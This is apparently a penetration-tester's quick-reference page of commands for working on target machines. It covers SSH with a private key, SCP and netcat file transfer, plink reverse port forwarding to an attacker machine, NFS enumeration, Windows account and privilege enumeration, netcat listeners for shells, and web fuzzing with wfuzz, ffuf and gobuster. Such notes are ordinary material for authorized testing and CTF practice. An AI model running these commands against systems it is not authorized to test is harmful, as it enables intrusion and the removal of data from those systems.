Quick Scripts
Quick Snippets to use in a pinch
SSH
Using a id_rsa
to login to a target, Do note you must have the password for the id_rsa
for this to work
ssh -i id_rsa User@IP
SCP
SCP is a great method of transferring files to and from the target in a pinch
scp User@IP:~/Dir ~/LocalDir
scp LocalFile User@IP:~/RemoteDir/File
PLINK
Plink is a tool that's part of the putty suite, it allows for ssh tunneling and in our use cases port forwarding. Once plink is on the target we first find the port we want to forward
netstat -ano
and then forward the port to our machine which should have a ssh profile setup
.\plink.exe -l AttackerMachineUserName -pw AttackerMachinePassword -R TargetMachinePort:127.0.0.1:AttackMachinePort AttackMachineIP
.\plink.exe -l hn -pw hn -R 5985:127.0.0.1:5985 10.10.10.10
NFS Mounts
NFS Mounts can sometimes be found on targets and can provide essential information about the target
They are often found on port
PORT STATE SERVICE
111/tcp open rpcbind
Enumeration
showmount -e IP #List Mounts
nmap -sV --script=nfs-showmount IP #Nmap List Mounts
nmap -sV --script=nfs-statfs IP #Nmap get mount statistics
nmap -sV --script=nfs-ls IP #Nmap list mounts and permissions
Local Mount
NFS Mounts can also be mounted locally
mount -t nfs IP:/NFSMountName /LocalMountLocation
mount #Lists locally mounted directories
umount IP:/NFSMountName #unmounts mounted NFS Directory
NFS Mounts can often be huge and take a bit of time to transfer data (especially in a turbulent network) as such it's advisable to use rsync
to pull files available on it down
rsync -anv /NFSMountLocation/ /LocalExistingDir
Powershell
Powershell Console History
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
Powershell is a very useful and powershell scripting language akin to bash more information about it's utilities can be found on https://docs.microsoft.com/en-us/powershell/module/
CMD
Output file content
type filename.txt
Other Useful Commands (these commands work on powershell as well)
dir /a #list files with full atributes including hidden
cmd /k #useful inline with payloads, runs & keeps payload alive
whoami /priv #whoami?
net user #list accounts
net user %USERNAME% #information about current account
net group #view Domain Groups
NetCat
Netcat is tool that allows for simple shells
nc -lnvp IP PORT #start netcat listener
nc IP PORT #use netcat to connect to a defined target
Netcat unfortunately isn't native on windows but we can still get it from https://eternallybored.org/misc/netcat/ and it works the same way!
Netcat can also be used for transferring files
nc -l -p 1234 > out.file #receiver
cat file | nc -w 3 IP PORT #sender
Fuzzing
Fuzzing is very useful for finding files that has a explicit name but no given explicit location, we can use fuzzing to find the given path using a pre-exisiting URL, fuzzing can also be used for exploiting LFI
as well as SQL
vulnerabilities
wfuzz -c -w 'wordlist' -u 'http://IP/file.php?id=FUZZ'
ffuf -u http://IP/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc
200,204,301,302,307,401 -o results.txt
DirBusting
Dirbusting can be considered a form of fuzzing but checks for whole directories and files, one such tool we can use for this is GoBuster
gobuster dir -u http://IP/ -w DirBuster-Lists/directory-list-2.3-medium.txt
Python
Simple Http server for a quick host
python -m SimpleHTTPServer 8088
C#
C# binaries can be decompiled with dnspy
https://github.com/0xd4d/dnSpy and can be compiled with https://dotnetfiddle.net/
Last updated